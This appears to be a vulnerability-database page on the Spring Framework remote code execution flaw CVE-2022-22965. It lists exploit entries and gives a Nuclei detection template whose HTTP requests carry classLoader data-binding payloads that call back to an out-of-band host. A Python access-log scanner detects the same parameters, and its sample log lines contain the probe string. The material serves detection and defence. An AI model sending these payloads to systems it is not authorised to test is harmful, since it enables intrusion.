| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Code Injection in Vmware Spring_Framework | 31 Mar 2022 19:19 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 20 Jun 2023 11:45 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 4 Apr 2022 10:37 | – | githubexploit |
| Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware | 19 Mar 2026 15:19 | – | githubexploit |
| Exploit for CVE-2020-1938 | 29 Nov 2025 08:31 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 1 Mar 2026 20:00 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 5 Apr 2022 15:45 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 31 Mar 2022 15:01 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 2 Nov 2024 00:26 | – | githubexploit |
| Exploit for Code Injection in Vmware Spring_Framework | 14 Jan 2026 07:45 | – | githubexploit |

```yaml
id: CVE-2022-22965

info:
  name: Spring - Remote Code Execution
  author: justmumu,arall,dhiyaneshDK,akincibor
  severity: critical
  description: |
    Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
  reference:
    - https://tanzu.vmware.com/security/cve-2022-22965
    - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
    - https://twitter.com/RandoriAttack/status/1509298490106593283
    - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
    - https://twitter.com/_0xf4n9x_/status/1509935429365100546
    - https://nvd.nist.gov/vuln/detail/cve-2022-22965
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22965
    cwe-id: CWE-94
    epss-score: 0.99677
    epss-percentile: 0.99948
    cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: vmware
    product: spring_framework
  tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware,vkev,vuln

http:
  - raw:
      - |
        POST {{BaseURL}} HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
      - |
        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1

    payloads:
      interact_protocol:
        - "http"
        - https

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
        case-insensitive: true
# digest: 4a0a00473045022026fcce45a31f9fc4262fb5ce2e002b9cb0cfbf8281997cb910f51e24ff78b9b70221008ada9679d5b1356b07db53f05f0f2f36fd50e05a6a674a58102dc35e8a030595:922c64590222798bb761d5b6d8e72950
```
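
A defender-side counterpart to the template's GET probe, as an added example that is not part of the original template or page: it scans web access logs for query parameter names that begin with the `class.module.classLoader` property path. The log lines, the `oast.example.invalid` host and all function names are constructed for illustration; also matching the shorter `class.classLoader` form is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Property-path prefix used by the template's probes. The optional "module."
# segment (so class.classLoader is flagged too) is an assumption of this example.
SUSPECT = re.compile(r"^class\.(module\.)?classloader\b", re.IGNORECASE)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so encoded variants of a name are still matched."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return the query parameter names in a request target that match SUSPECT."""
    hits = []
    for pair in urlsplit(target).query.split("&"):
        name = decode_fully(pair.split("=", 1)[0])
        if SUSPECT.match(name):
            hits.append(name)
    return hits

def scan(lines):
    """Return (line_number, client_ip, names) for every flagged access-log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        names = suspicious_params(match.group("target")) if match else []
        if names:
            findings.append((number, line.split(" ", 1)[0], names))
    return findings

# Constructed sample lines in combined log format, not from a real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2022:10:00:00 +0000] "GET /?class.module.classLoader.resources.context.configFile=http://oast.example.invalid&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Apr/2022:10:00:05 +0000] "GET /search?q=class.module HTTP/1.1" 200 100',
    '192.0.2.12 - - [01/Apr/2022:10:00:09 +0000] "GET /?class%252Emodule%252EclassLoader.resources.context.configFile=x HTTP/1.1" 400 0',
    '192.0.2.13 - - [01/Apr/2022:10:00:12 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for number, client, names in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent {names}")
```

Access logs record only the request line, so the template's POST variant, which carries the same parameter names in the form body, needs request-body inspection at a WAF or proxy to be seen.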